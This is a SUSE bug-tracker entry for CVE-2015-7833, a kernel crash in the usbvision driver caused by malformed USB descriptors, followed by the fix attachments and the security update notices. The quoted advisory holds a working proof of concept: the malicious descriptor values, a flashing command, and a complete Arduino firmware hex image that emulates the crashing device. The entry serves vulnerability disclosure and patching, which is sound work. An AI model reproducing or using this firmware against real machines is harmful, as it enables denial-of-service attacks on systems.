Bugzilla – Bug 950998
VUL-1: CVE-2015-7833: kernel: usbvision: crash on invalid USB device descriptors
Last modified: 2020-06-08 23:22:14 UTC
http://seclists.org/bugtraq/2015/Oct/35 OS-S Security Advisory 2015-04 http://www.os-s.net/advisories/DOS-KernelCrashesOnInvalidUSBDeviceDescriptors-UsbvisionDriver.pdf CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) The Kernel 3.10.0-123.20.1.el7.x86_64 crashes when presented a buggy USB device which requires the usbvision driver. All subsequently published kernel updates crash as well. Detailed product description confirmed the bug on the following system: RHEL 7.3 kernel >= 3.10.0-123.20.1.el7.x86_64 [...] ###[ USB_Device_Descriptor ]### bLength = 18 bDescriptorType= 0x1 bcdUSB = 0x200 bDeviceClass= 0xff bDeviceSubClass= 0 bDeviceProtocol= 0 bMaxPacketSize= 64 isVendor = 0x573 idProduct = 0x4d26 bcdDevice = 0x100 iManufacturer= 1 iProduct = 2 iSerialNumber= 3 bNumConfigurations= 1 This is the configuration descriptor containing the malicious value for bInterfaceNumber causing the crash. Any number but 0 crashes the system. ###[ USB_Configuration_Descriptor ]### bLength = 9 bDescriptorType= 0x2 wTotalLength= 0x27 bNumInterfaces= 1 bConfigurationValue= 1 iConfiguration= 0 bmAttributes= Remote_Wakeup+Self_Powered+Reserved_D7 bMaxPower = 49 ###[ USB_Interface_Descriptor ]### bLength = 9 bDescriptorType= 0x4 bInterfaceNumber= 255 bAlternateSetting= 0 bNumEndpoints= 3 bInterfaceClass= 0xff bInterfaceSubClass= 0x0 bInterfaceProtocol= 0x0 iInterface= 0 ###[ USB_Endpoint_Descriptor ]### bLength = 7 bDescriptorType= 0x5 bEndpointAddress= 0x81 bmAttribut= 0x3 wMaxPacketSize= 1028 bInterval = 12 ###[ USB_Endpoint_Descriptor ]### bLength = 7 bDescriptorType= 0x5 bEndpointAddress= 0x1 bmAttribut= 0x2 wMaxPacketSize= 4 bInterval = 12 ###[ USB_Endpoint_Descriptor ]### bLength = 7 bDescriptorType= 0x5 bEndpointAddress= 0x82 bmAttribut= 0x1 wMaxPacketSize= 4 bInterval = 12 Proof of Concept For a proof of concept we are providing a Arduino firmware file. Just flash it on Arduino Leonardo and plug it into any RHEL machine. The arduino will emulate the defective USB device. avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U flash:w:binary.hex The file binary.hex has been attached to this bug report To prevent automated sending of payloads, use a jumper to connect port D3 and 3V3! Severity and Ease of Exploitation The security weakness can be easily exploited. Using our arduino firmware only physical access to the system is required. Vendor Communication We unsuccessfully tried to contact the vendor for several months. We never received any response on our bugtraq ticket: https://bugzilla.redhat.com/show_bug.cgi?id=1201858 Arduino Firmware :100000000C94A8000C94C5000C94C5000C94C50079 :100010000C94C5000C94C5000C94C5000C94C5004C :100020000C94C5000C94C5000C94CC050C943704BA :100030000C94C5000C94C5000C94C5000C94C5002C :100040000C94C5000C94C5000C94C5000C94C5001C :100050000C94C5000C94C5000C94C5000C941602B9 :100060000C94C5000C94C5000C94C5000C94C500FC :100070000C94C5000C94C5000C94C5000C94C500EC :100080000C94C5000C94C5000C94C5000C94C500DC :100090000C94C5000C94C5000C94C5000C94C500CC :1000A0000C94C5000C94C5000C94C50013031603F2 :1000B00009030D033703370337031A031E03220313 :1000C00028032C03370332030000000200080E004F :1000D00000030401000B000000000000000000000D :1000E00000000000000004080201104080401020C1 :1000F00040804080080204018040201002011080EE :100100001020404004040404040304050202020217 :1001100004030202020206060606060604040202A0 :100120000204000000002300260029002C002F00FC :1001300000000000250028002B002E0031000000E8 :100140000000240027002A002D00300000C180811B :1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 :10016000B1E0E4EEF3E102C005900D92A436B107D0 :10017000D9F725E0A4E6B5E001C01D92AF37B2077C :10018000E1F70E94C8000C940C070C94000008953D :10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 :1001A000DEBF0FBECDBF0E94A9020E94C70060E063 :1001B00083E00E94380361E087E00E94380361E039 :1001C00088E00E9438030E9461067E012AE9E20E5F :1001D000F11C84E093E0D70111969C938E9389E003 :1001E00094E013969C938E93129782E2E2E1F1E001 :1001F0009E012F5F3F4F6901D90101900D928A95B1 :10020000E1F788E1E4E3F1E0DE01939601900D92DD :100210008A95E1F782E1ECE4F1E0DE01DB96019002 :100220000D928A95E1F789E0EEE5F1E0DE01A05953 :10023000BF4F01900D928A95E1F7CE0189599F4FEA :1002400029E0922EDC01E92D1D92EA95E9F78E0155 :1002500009571F4F27E0E7E6F1E0D80101900D9222 :100260002A95E1F7BE0160587F4F27E0EEE6F1E006 :10027000DB0101900D922A95E1F7AE0147585F4FDF :1002800027E0E5E7F1E0DA0101900D922A95E1F728 :100290005E01FEE8AF0EB11C26E0ECE7F1E0D5010F :1002A00001900D922A95E1F79E01235B3F4FEEE00E :1002B000D9011D92EA95E9F7F3E0D9011996FC936B :1002C000DC019C92E4E01196EC931197EFEF12960B :1002D000EC9312971496FC9314971596EC93FC01EB :1002E000D901892D01900D928A95E1F7FE01EC5616 :1002F000FF4FD9011B96FC93EE931A971D96BC9263 :10030000AE921C9711830083738362835583448369 :100310000C5211098CE0F80111928A95E9F781E0FD :10032000D80119968C931997FE01E059FF4F01905F :100330000D929A94E1F7F8013387228761E088E013 :100340000E9471038BE492E00E946D0688E892E0BF :100350000E946D0687EC92E00E946D0686E093E0B5 :100360000E946D0682E493E00E946D068FE793E0A1 :100370000E946D0684EA93E00E946D068BEE93E086 :100380000E946D0683E00E94A703892B09F047C0F5 :100390005E01F3E2AF0EB11C8824839482E1982EB3 :1003A00084E194E00E946D06BF92AF92DF92CF92FB :1003B000FF92EF921F928F921F930F932DB73EB72C :1003C000225131090FB6F8943EBF0FBE2DBFADB715 :1003D000BEB71196FE01FB96892D01900D928A956C :1003E000E1F78DE695E00E940B0668E873E180E096 :1003F00090E00E9483028DE695E00E94560660E040 :1004000087E00E94710368E873E180E090E00E9459 :1004100083020FB6F894DEBF0FBECDBFC1CF6AE036 :1004200070E080E090E00E948302ACCF1F920F92B8 :100430000FB60F9211242F933F938F939F93AF93F7 :10044000BF938091650590916605A0916705B09175 :1004500068053091640523E0230F2D3720F40196C1 :10046000A11DB11D05C026E8230F0296A11DB11DD7 :10047000209364058093650590936605A0936705B6 :10048000B09368058091690590916A05A0916B050C :10049000B0916C050196A11DB11D809369059093E3 :1004A0006A05A0936B05B0936C05BF91AF919F91C6 :1004B0008F913F912F910F900FBE0F901F90189525 :1004C0003FB7F8948091690590916A05A0916B05FA :1004D000B0916C0526B5A89B05C02F3F19F0019679 :1004E000A11DB11D3FBF6627782F892F9A2F620F5C :1004F000711D811D911D42E0660F771F881F991F96 :100500004A95D1F70895CF92DF92EF92FF92CF9361 :10051000DF936B017C010E946002EB01C114D104E6 :10052000E104F10479F00E9460026C1B7D0B683ECF :100530007340A0F381E0C81AD108E108F108C8515E :10054000DC4FECCFDF91CF91FF90EF90DF90CF9019 :100550000895789484B5826084BD84B5816084BD3B :1005600085B5826085BD85B5816085BDEEE6F0E02C :10057000808181608083E1E8F0E010828081826088 :100580008083808181608083E0E8F0E08081816009 :100590008083E1E9F0E080818260808380818160F6 :1005A0008083E0E9F0E0808181608083E1ECF0E02D :1005B000808184608083808182608083808181608B :1005C0008083E3ECF0E0808181608083E0ECF0E008 :1005D000808182608083E2ECF0E0808181608083B2 :1005E000EAE7F0E08081846080838081826080839C :1005F000808181608083808180688083089590E01D :10060000FC013197EE30F10590F5EA5AFF4F0C945A :10061000B309809180008F7703C0809180008F7D27 :1006200080938000089584B58F7702C084B58F7D54 :1006300084BD0895809190008F7707C080919000CD :100640008F7D03C080919000877F809390000895F4 :100650008091C0008F7703C08091C0008F7D809310 :10066000C00008958091C200877F8093C2000895E2 :10067000CF93DF9390E0FC01EA51FF4F2491FC01FE :10068000EC5FFE4F8491882349F190E0880F991F19 :10069000FC01E25CFE4FA591B491805D9E4FFC0190 :1006A000C591D4919FB7611108C0F8948C912095A1 :1006B00082238C93888182230AC0623051F4F8949B :1006C0008C91322F309583238C938881822B888361 :1006D00004C0F8948C91822B8C939FBFDF91CF91B3 :1006E00008950F931F93CF93DF931F92CDB7DEB77B :1006F000282F30E0F901E853FF4F8491F901EA51C6 :10070000FF4F1491F901EC5FFE4F04910023C9F0F3 :10071000882321F069830E94FF026981E02FF0E0C5 :10072000EE0FFF1FE05DFE4FA591B4919FB7F894C7 :100730008C91611103C01095812301C0812B8C9392 :100740009FBF0F90DF91CF911F910F910895CF938D :10075000DF93282F30E0F901E853FF4F8491F9012E :10076000EA51FF4FD491F901EC5FFE4FC491CC23C5 :1007700091F081110E94FF02EC2FF0E0EE0FFF1FBD :10078000EE5DFE4FA591B4912C912D2381E090E078 :1007900021F480E002C080E090E0DF91CF910895E5 :1007A000615030F02091F100FC0120830196F8CFD8 :1007B000289884E680937D0508951092E9001092B0 :1007C00071051092700590936F0580936E050895E2 :1007D000FF920F931F93CF93DF93F82E8B01EA01C3 :1007E000BA01C8010E94AE06F80120E030E08EEFA9 :1007F0002C173D0791F1F7FE02C0A49101C0A08122 :10080000609170057091710540916E0550916F0572 :1008100064177507ACF49091E8009570E1F390913E :10082000E80092FD1CC0A093F100A0917005B0916A :1008300071051196AF73BB27AB2B11F48093E800C1 :10084000A0917005B09171051196B0937105A093B8 :1008500070052F5F3F4F3196CBCFC90102C08FEF9C :100860009FEFDF91CF911F910F91FF9008951F92FD :100870000F920FB60F9211246F927F928F929F92D8 :10088000AF92BF92CF92DF92EF92FF920F931F939E :100890002F933F934F935F936F937F938F939F9388 :1008A000AF93BF93EF93FF93CF93DF93CDB7DEB7B3 :1008B0006297DEBFCDBF1092E9008091E80083FF10 :1008C00046C168E0CE010A960E94D00382EF809371 :1008D000E8009A8597FF05C08091E80080FFFCCF73 :1008E00003C08EEF8093E800892F807609F023C142 :1008F0008B85811105C01092F1001092F10020C18A :10090000282F2D7F213009F41BC1853049F48091B7 :10091000E80080FFFCCF8C8580688093E30010C1E5 :10092000863009F0E1C02D8508891989223009F047 :10093000B3C0EC848E2D90E0209173053091740546 :10094000821793070CF09FC00E94DD031F92EF9265 :100950008DE394E09F938F930E948B068CE0E89E3A :1009600070011124E0917505F0917605EE0DFF1DE3 :1009700089E0DE01119601900D928A95E1F7C80198 :100980000E94DD0349E050E0BE016F5F7F4F80E0D1 :100990000E94E8030F900F900F900F90C12CD12C64 :1009A000612C712C33E7A32E34E0B32E4AEA842E57 :1009B00044E0942EE0917505F0917605EE0DFF1D53 :1009C000818590E0681679060CF0BAC07F926F922C :1009D000BF92AF920E948B06E0917505F09176056B :1009E000EE0DFF1D628573856C0D7D1D49E050E0A5 :1009F00080E00E94E8030F900F900F900F9000E0AE :100A000010E0E0917505F0917605EE0DFF1D028472 :100A1000F385E02DEC0DFD1D818590E00817190789 :100A20005CF51F930F939F928F920E948B06E0912B :100A30007505F0917605EE0DFF1D0284F385E02D1E :100A4000EC0DFD1DC801880F991FA485B585A80F61 :100A5000B91F4D915C910284F385E02DE80FF91FD9 :100A60006081718180E00E94E8030F5F1F4F0F904B :100A70000F900F900F90C5CF8FEF681A780A8EE015 :100A8000C80ED11C97CF8FED94E09F938F930E9457 :100A90008B060F900F9058C0C8012A8B0E94DD036F :100AA0002A892130C1F0233009F04EC08C851F9275 :100AB0008F9389EF94E09F938F930E948B0642E07F :100AC00050E062E871E080E00E94E8030F900F9030 :100AD0000F900F9035C04091000150E060E071E050 :100AE00080E00E94E8032CC0873071F1883021F447 :100AF00081E08093F10024C0893011F5937021F5D5 :100B0000EDE4F1E081E021E096E38093E9002093B9 :100B1000EB0034913093EC009093ED008F5F3196B1 :100B2000843099F78EE78093EA001092EA008C8572 :100B30008093720505C0888999890E94DD0304C0ED :100B40008EEF8093E80003C081E28093EB00629611 :100B50000FB6F894DEBF0FBECDBFDF91CF91FF91EE :100B6000EF91BF91AF919F918F917F916F915F9125 :100B70004F913F912F911F910F91FF90EF90DF9038 :100B8000CF90BF90AF909F908F907F906F900F907D :100B90000FBE0F901F9018951F920F920FB60F92D5 :100BA00011248F939F938091E1001092E10083FFC5 :100BB0000FC01092E90091E09093EB001092EC00CE :100BC00092E39093ED001092720598E09093F000FC :100BD00082FF1AC080917E05882339F080917E05BE :100BE000815080937E05882369F080917D0588235C :100BF00059F080917D05815080937D05811104C05D :100C0000289A02C05D9AF1CF9F918F910F900FBEED :100C10000F901F901895CF93DF93CDB7DEB782E189 :100C2000FE013596A0E0B1E001900D928A95E1F7C2 :100C30008F89988D9093760580937505898D9A8D0F :100C400090937405809373058B8D9C8D90937C0598 :100C500080937B058D8D9E8D90937A058093790589 :100C60008F8D98A1909378058093770510927205E7 :100C700081E08093D70080EA8093D80082E189BD2B :100C800009B400FEFDCF61E070E080E090E00E94DA :100C9000830280E98093D8008CE08093E200109278 :100CA000E000559A209ADF91CF91089581E08093DA :100CB000E00008959091C80095FFFCCF8093CE008E :100CC00008951092CD0087E68093CC0088E1809350 :100CD000C9008EE08093CA0008950F931F93CF93AD :100CE000DF93EC018C01FE0101900020E9F73197C0 :100CF000EC1BFD0BC8018C1B9D0B8E179F0730F45E :100D0000F80181918F010E945A06EDCFDF91CF91BA :100D10001F910F910895CF93DF93CDB7DEB7DA958A :100D20000FB6F894DEBF0FBECDBFFE01EB5FFE4FE6 :100D3000419151919F0160E071E0CE0101960E94C6 :100D40000F07CE0101960E946D06D3950FB6F89459 :100D5000DEBF0FBECDBFDF91CF9108958F929F92DE :100D6000AF92BF92CF92DF92EF92FF920F931F93B9 :100D7000CF93DF9300D0CDB7DEB75B0122E535E03E :100D80003F932F9389839A830E948B068981882EB3 :100D90009A81992E0F900F9000E010E08EE5E82EDA :100DA00085E0F82E91E1C92E94E0D92E0A151B0595 :100DB000E4F4F40181914F0190E09F938F93FF92AF :100DC000EF920E948B060F5F1F4FC8018F7099270B :100DD0000F900F900F900F90892B41F7DF92CF92D9 :100DE0000E948B060F900F90E1CF81E194E09F93DA :100DF0008F930E948B060F900F900F900F90DF91B2 :100E0000CF911F910F91FF90EF90DF90CF90BF9007 :100E1000AF909F908F900895F8940C94F009AEE0F5 :100E2000B0E0E5E1F7E00C94C7098C01CA0146E0A7 :100E30004C831A83098377FF02C060E070E8615039 :100E400071097E836D83A901BC01CE0101960E94C8 :100E50003B074D815E8157FD0AC02F8138854217BF :100E600053070CF49A01F801E20FF31F10822E963B :100E7000E4E00C94E309ACE0B0E0E1E4F7E00C94CA :100E8000B9097C016B018A01FC01178216828381FA :100E900081FFBDC1CE0101964C01F7019381F6019E :100EA00093FD859193FF81916F01882309F4ABC174 :100EB000853239F493FD859193FF81916F018532DD :100EC00029F4B70190E00E942309E7CF512C312C7F :100ED00020E02032A0F48B3269F030F4803259F0F7 :100EE000833269F420612CC08D3239F0803339F4BB :100EF000216026C02260246023C0286021C027FD15 :100F000027C030ED380F3A3078F426FF06C0FAE0FB :100F10005F9E300D1124532E13C08AE0389E300D91 :100F20001124332E20620CC08E3221F426FD6BC1B9 :100F3000206406C08C3611F4206802C0883641F463 :100F4000F60193FD859193FF81916F018111C1CFCE :100F5000982F9F7D9554933028F40C5F1F4FFFE32B :100F6000F9830DC0833631F0833771F0833509F092 :100F70005BC022C0F801808189830E5F1F4F44242B :100F80004394512C540115C03801F2E06F0E711CCE :100F9000F801A080B18026FF03C0652D70E002C07B :100FA0006FEF7FEFC5012C870E9418092C01830188 :100FB0002C852F77222E17C03801F2E06F0E711C9E :100FC000F801A080B18026FF03C0652D70E002C04B :100FD0006FEF7FEFC5012C870E940D092C012C8536 :100FE0002068222E830123FC1BC0832D90E048162D :100FF0005906B0F4B70180E290E00E9423093A94C8 :10100000F4CFF50127FC859127FE81915F01B7019F :1010100090E00E94230931103A94F1E04F1A5108F0 :101020004114510471F7E5C0843611F0893639F561 :10103000F80127FF07C060817181828193810C5F75 :101040001F4F08C060817181882777FD8095982F98 :101050000E5F1F4F2F76B22E97FF09C09095809597 :10106000709561957F4F8F4F9F4F2068B22E2AE079 :1010700030E0A4010E945509A82EA81844C0853765 :1010800029F42F7EB22E2AE030E025C0F22FF97F1E :10109000BF2E8F36C1F018F4883579F0B4C0803790 :1010A00019F0883721F0AFC02F2F2061B22EB4FE87 :1010B0000DC08B2D8460B82E09C024FF0AC09F2F5D :1010C0009660B92E06C028E030E005C020E130E08F :1010D00002C020E132E0F801B7FE07C060817181F3 :1010E000828193810C5F1F4F06C06081718180E017 :1010F00090E00E5F1F4FA4010E945509A82EA8186A :10110000FB2DFF77BF2EB6FE0BC02B2D2E7FA51417 :1011100050F4B4FE0AC0B2FC08C02B2D2E7E05C0D0 :101120007A2C2B2D03C07A2C01C0752C24FF0DC006 :10113000FE01EA0DF11D8081803311F4297E09C082 :1011400022FF06C07394739404C0822F867809F03E :10115000739423FD13C020FF06C05A2C731418F497 :10116000530C5718732C731468F4B70180E290E0A5 :101170002C870E94230973942C85F5CF731410F4E7 :10118000371801C0312C24FF12C0B70180E390E072 :101190002C870E9423092C8522FF17C021FF03C042 :1011A00088E590E002C088E790E0B7010CC0822F8C :1011B000867859F021FD02C080E201C08BE227FD54 :1011C0008DE2B70190E00E942309A51438F4B7011D :1011D00080E390E00E9423095A94F7CFAA94F40187 :1011E000EA0DF11D8081B70190E00E942309A11052 :1011F000F5CF332009F451CEB70180E290E00E9490 :1012000023093A94F6CFF7018681978102C08FEFC8 :101210009FEF2C96E2E10C94D509FC0105906150FA :1012200070400110D8F7809590958E0F9F1F0895FC :10123000FC016150704001900110D8F780959095A5 :101240008E0F9F1F08950F931F93CF93DF93182F37 :10125000092FEB018B8181FD03C08FEF9FEF20C031 :1012600082FF10C04E815F812C813D814217530760 :101270007CF4E881F9819F012F5F3F4F39832883F8 :10128000108306C0E885F985812F0995892B29F7F8 :101290002E813F812F5F3F4F3F832E83812F902FE1 :1012A000DF91CF911F910F910895FA01AA2728305D :1012B00051F1203181F1E8946F936E7F6E5F7F4F23 :1012C0008F4F9F4FAF4FB1E03ED0B4E03CD0670F9F :1012D000781F891F9A1FA11D680F791F8A1F911DF2 :1012E000A11D6A0F711D811D911DA11D20D009F442 :1012F00068943F912AE0269F11243019305D319384 :10130000DEF6CF010895462F4770405D4193B3E06C :101310000FD0C9F7F6CF462F4F70405D4A3318F013 :10132000495D31FD4052419302D0A9F7EACFB4E0C4 :10133000A6959795879577956795BA95C9F700977C :101340006105710508959B01AC010A2E069457951D :10135000479537952795BA95C9F7620F731F841F74 :10136000951FA01D0895EE0FFF1F0590F491E02D2D :1013700009942F923F924F925F926F927F928F9239 :101380009F92AF92BF92CF92DF92EF92FF920F9314 :101390001F93CF93DF93CDB7DEB7CA1BDB0B0FB61E :1013A000F894DEBF0FBECDBF09942A8839884888DB :1013B0005F846E847D848C849B84AA84B984C88471 :1013C000DF80EE80FD800C811B81AA81B981CE0F68 :1013D000D11D0FB6F894DEBF0FBECDBFED0108954D :0413E000F894FFCFAF :1013E4001201000200000040AD0BEFBE000101023B :1013F4000001220342006100640020004200410019 :1014040042004500250078002500780025006E0084 :1014140025007000180342004100440020004300EE :10142400300046004600450045002100120100023C :10143400FF0000407305264D00010102030109026B :10144400270001010000FA0705810304040C0705C5 :10145400010204000C0705820104000C07000700C8 :101464000700480100500072006F006C00690066BC :101474000069006300000A550000006BFD180A00B3 :10148400809F0AB901312B940A8101128946001305 :10149400000257028B0A5E0AF80A5F01F212010089 :1014A40002010000400D055702000101020301B9C9 :1014B4000A0100F80A5F0A810A22034200610064FB :1014C400002000420041004200450025007800252C :1014D40000780025006E00250070001803420041CA :1014E400004400200043003000460046004500450B :1014F40000210012010002010000400D0557020006 :10150400010102030109040000030100000003F2C9 :101514000AEC0A0902270001010000FA01AB0A09DA :101524000400000301000000090200202020202004 :101534005F5F5F5F5F5F5F5F2020202020202020AF :101544002020202020202020202020202020202097 :1015540020205F5F5F5F5F205F5F20205F2020208F :101564002020205F5F0A0D00202020202F205F5FB5 :101574005F5F2F202F5F20205F5F5F5F205F5F5FD3 :101584005F5F20205F5F5F5F5F20202020202F208F :101594005F5F5F2F2F202F5F285F295F5F5F5F2FC3 :1015A400202F5F5F0A0D002020202F202F202020D5 :1015B4002F205F5F205C2F205F5F20602F205F5F04 :1015C400205C2F205F5F5F2F5F5F5F5F205C5F5F4A :1015D400205C2F205F5F2F202F205F5F5F2F202F45 :1015E4002F5F2F0A0D0020202F202F5F5F5F2F20F9 :1015F4002F202F202F202F5F2F202F202F5F2F20F1 :10160400285F5F2020292F5F5F5F2F205F5F2F20DF :101614002F202F5F2F202F202F5F5F2F202C3C0A9D :101624000D0020205C5F5F5F5F2F5F2F202F5F2FF7 :101634005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F4F :101644002F20202020202F5F5F5F5F2F5C5F5F2FA4 :101654005F2F5C5F5F5F2F5F2F7C5F7C0A0D002034 :101664003C3C2043485241534820414E59204F505E :1016740045524154494E472053595354454D203EF9 :101684003E0A0D00203C3C202863292053657267E4 :10169400656A20536368756D696C6F20323031352B :1016A4002C204F70656E536F7572636520536563AC :1016B40075726974792052616C66205370656E6E20 :1016C4006562657267203E3E0A0D000A3E3E205068 :1016D4007265737320627574746F6E20746F2073F7 :1016E4007461727420657865637574696F6E2E2EEB :1016F4002E0A0D005B44454255475D2045786563DD :10170400757465207061796C6F616420300A0D0016 :10171400526563762D446174613A0A0D005B444559 :101724004255475D200953656E6420436F6E6669B8 :101734006775726174696F6E4465736372697074FE :101744006F720928696E6465783A2569292E2E2EF0 :101754000D0A005B44454255475D200953656E649C :1017640020496E74657266616365204465736372B3 :101774006970746F720928696E7465726661636555 :101784003A2569292E2E2E0D0A005B444542554701 :101794005D200953656E6420456E64706F696E74D4 :1017A4002044657363726970746F720928656E648E :1017B400706F696E743A2569292E2E2E0D0A005B0E :1017C40044454255475D203C3C70616E6963206D21 :1017D4006F64653F3E3E0D0A005B44454255475DDC :1017E4002009203E3E20537472696E67204465735D :1017F40063726970746F7220726571756573742099 :101804002D2073656E64696E67206D616C666F72FE :101814006D656420737472696E67212073657475D5 :10182400702E7756616C75654C203D3D2025690D01 :101834000A005B48455844554D505D0A0D0025305B :0418440032582000F6 :00000001FF References: https://bugzilla.redhat.com/show_bug.cgi?id=1270158 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7833 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7833
bugbot adjusting priority
Created attachment 653350 [details] fix the overflow of the interfaces array by sanity checking - the pointer is checked for NULL - array overflows are handled by range checking
Created attachment 656040 [details] backport for SP3
Fix submitted to the vulnerable kernel trees.
SUSE-SU-2015:2194-1: An update that solves 8 vulnerabilities and has 45 fixes is now available. Category: security (important) Bug References: 814440,867595,904348,921949,924493,930145,933514,935961,936076,936773,939826,939926,940853,941202,941867,942938,944749,945626,946078,947241,947321,947478,948521,948685,948831,949100,949463,949504,949706,949744,950013,950750,950862,950998,951110,951165,951199,951440,951546,952666,952758,953796,953980,954635,955148,955224,955422,955533,955644,956047,956053,956703,956711 CVE References: CVE-2015-0272,CVE-2015-2925,CVE-2015-5283,CVE-2015-5307,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104 Sources used: SUSE Linux Enterprise Workstation Extension 12 (src): kernel-default-3.12.51-52.31.1 SUSE Linux Enterprise Software Development Kit 12 (src): kernel-docs-3.12.51-52.31.5, kernel-obs-build-3.12.51-52.31.1 SUSE Linux Enterprise Server 12 (src): kernel-default-3.12.51-52.31.1, kernel-source-3.12.51-52.31.1, kernel-syms-3.12.51-52.31.1, kernel-xen-3.12.51-52.31.1 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.51-52.31.1 SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12_Update_9-1-2.2 SUSE Linux Enterprise Desktop 12 (src): kernel-default-3.12.51-52.31.1, kernel-source-3.12.51-52.31.1, kernel-syms-3.12.51-52.31.1, kernel-xen-3.12.51-52.31.1
SUSE-SU-2015:2292-1: An update that solves 7 vulnerabilities and has 54 fixes is now available. Category: security (important) Bug References: 758040,814440,904348,921949,924493,926238,933514,936773,939826,939926,940776,941113,941202,943959,944296,947241,947478,949100,949192,949706,949744,949936,950013,950580,950750,950998,951110,951165,951440,951638,951864,952384,952666,953717,953826,953830,953971,953980,954635,954986,955136,955148,955224,955354,955422,955533,955644,956047,956053,956147,956284,956703,956711,956717,956801,956876,957395,957546,958504,958510,958647 CVE References: CVE-2015-0272,CVE-2015-2925,CVE-2015-5156,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8215 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP1 (src): kernel-default-3.12.51-60.20.2 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): kernel-docs-3.12.51-60.20.2, kernel-obs-build-3.12.51-60.20.1 SUSE Linux Enterprise Server 12-SP1 (src): kernel-default-3.12.51-60.20.2, kernel-source-3.12.51-60.20.2, kernel-syms-3.12.51-60.20.2, kernel-xen-3.12.51-60.20.2 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.51-60.20.2 SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12-SP1_Update_1-1-4.1 SUSE Linux Enterprise Desktop 12-SP1 (src): kernel-default-3.12.51-60.20.2, kernel-source-3.12.51-60.20.2, kernel-syms-3.12.51-60.20.2, kernel-xen-3.12.51-60.20.2
SUSE-SU-2015:2339-1: An update that solves 10 vulnerabilities and has 57 fixes is now available. Category: security (important) Bug References: 814440,879378,879381,900610,904348,904965,921081,926774,930145,930770,930788,930835,932805,935123,935757,937256,937444,938706,939826,939926,939955,940017,940913,940946,941202,942938,943786,944296,944677,944831,944837,944989,944993,945691,945825,945827,946078,946214,946309,947957,948330,948347,948521,949100,949298,949502,949706,949744,949936,949981,950298,950750,950998,951440,952084,952384,952579,952976,953527,953799,953980,954404,954628,954950,954984,955673,956709 CVE References: CVE-2015-0272,CVE-2015-5157,CVE-2015-5307,CVE-2015-6937,CVE-2015-7509,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215 Sources used: SUSE Linux Enterprise Software Development Kit 11-SP4 (src): kernel-docs-3.0.101-68.2 SUSE Linux Enterprise Server 11-SP4 (src): kernel-default-3.0.101-68.1, kernel-ec2-3.0.101-68.1, kernel-pae-3.0.101-68.1, kernel-ppc64-3.0.101-68.1, kernel-source-3.0.101-68.1, kernel-syms-3.0.101-68.1, kernel-trace-3.0.101-68.1, kernel-xen-3.0.101-68.1 SUSE Linux Enterprise Server 11-EXTRA (src): kernel-default-3.0.101-68.1, kernel-pae-3.0.101-68.1, kernel-ppc64-3.0.101-68.1, kernel-trace-3.0.101-68.1, kernel-xen-3.0.101-68.1 SUSE Linux Enterprise Desktop 11-SP4 (src): kernel-default-3.0.101-68.1, kernel-pae-3.0.101-68.1, kernel-source-3.0.101-68.1, kernel-syms-3.0.101-68.1, kernel-trace-3.0.101-68.1, kernel-xen-3.0.101-68.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-default-3.0.101-68.1, kernel-ec2-3.0.101-68.1, kernel-pae-3.0.101-68.1, kernel-ppc64-3.0.101-68.1, kernel-trace-3.0.101-68.1, kernel-xen-3.0.101-68.1
SUSE-SU-2015:2350-1: An update that solves 10 vulnerabilities and has 62 fixes is now available. Category: security (important) Bug References: 814440,879378,879381,900610,904348,904965,921081,926709,926774,930145,930770,930788,930835,932805,935053,935123,935757,937256,937444,937969,937970,938706,939207,939826,939926,939955,940017,940913,940946,941202,942938,943786,944677,944831,944837,944989,944993,945691,945825,945827,946078,946214,946309,947957,948330,948347,948521,949100,949298,949502,949706,949744,949936,949981,950298,950750,950998,951440,952084,952384,952579,952976,953527,953799,953980,954404,954628,954950,954984,955354,955673,956709 CVE References: CVE-2015-0272,CVE-2015-5157,CVE-2015-5307,CVE-2015-6937,CVE-2015-7509,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215 Sources used: SUSE Linux Enterprise Real Time Extension 11-SP4 (src): kernel-rt-3.0.101.rt130-48.1, kernel-rt_trace-3.0.101.rt130-48.1, kernel-source-rt-3.0.101.rt130-48.1, kernel-syms-rt-3.0.101.rt130-48.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-rt-3.0.101.rt130-48.1, kernel-rt_debug-3.0.101.rt130-48.1, kernel-rt_trace-3.0.101.rt130-48.1
openSUSE-SU-2016:0280-1: An update that solves 10 vulnerabilities and has 18 fixes is now available. Category: security (important) Bug References: 865096,865259,913996,950178,950998,952621,954324,954532,954647,955422,956708,957152,957988,957990,958439,958463,958504,958510,958886,958951,959190,959399,960021,960710,961263,961509,962075,962597 CVE References: CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728 Sources used: openSUSE Leap 42.1 (src): kernel-debug-4.1.15-8.1, kernel-default-4.1.15-8.1, kernel-docs-4.1.15-8.3, kernel-ec2-4.1.15-8.1, kernel-obs-build-4.1.15-8.2, kernel-obs-qa-4.1.15-8.1, kernel-obs-qa-xen-4.1.15-8.1, kernel-pae-4.1.15-8.1, kernel-pv-4.1.15-8.1, kernel-source-4.1.15-8.1, kernel-syms-4.1.15-8.1, kernel-vanilla-4.1.15-8.1, kernel-xen-4.1.15-8.1
